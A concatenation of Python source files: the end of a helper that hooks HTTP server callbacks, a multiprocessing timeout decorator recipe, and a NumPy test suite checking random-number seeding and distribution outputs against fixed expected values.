"""Sets a callback for a given subdir."""
if httpServer is None:
startServer()
httpServer.hook(subdir, callback)
def unhook(subdir):
"""Unsets the callback assigned to the given subdir, and return it."""
global httpServer
assert httpServer is not None
callback = httpServer.unhook(subdir)
if len(httpServer.callbacks) <= 0 and not configGroup.keepAlive():
stopServer()
|
recipe-577028.py
|
import multiprocessing as MP
from sys import exc_info
from time import clock
DEFAULT_TIMEOUT = 60
################################################################################
def timeout(limit=None):
if limit is None:
limit = DEFAULT_TIMEOUT
if limit <= 0:
raise ValueError()
def wrapper(function):
return _Timeout(function, limit)
return wrapper
class TimeoutError(Exception): pass
################################################################################
def _target(queue, function, *args, **kwargs):
try:
queue.put((True, function(*args, **kwargs)))
except:
queue.put((False, exc_info()[1]))
class _Timeout:
def __init__(self, function, limit):
self.__limit = limit
self.__function = function
self.__timeout = clock()
self.__process = MP.Process()
self.__queue = MP.Queue()
def __call__(self, *args, **kwargs):
self.cancel()
self.__queue = MP.Queue(1)
args = (self.__queue, self.__function) + args
self.__process = MP.Process(target=_target, args=args, kwargs=kwargs)
self.__process.daemon = True
self.__process.start()
self.__timeout = self.__limit + clock()
def cancel(self):
if self.__process.is_alive():
self.__process.terminate()
@property
def ready(self):
if self.__queue.full():
return True
elif not self.__queue.empty():
return True
elif self.__timeout < clock():
self.cancel()
else:
return False
@property
def value(self):
if self.ready is True:
flag, load = self.__queue.get()
if flag:
return load
raise load
raise TimeoutError()
def __get_limit(self):
return self.__limit
def __set_limit(self, value):
if value <= 0:
raise ValueError()
self.__limit = value
limit = property(__get_limit, __set_limit)
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
run_module_suite, assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
import warnings
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianess
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
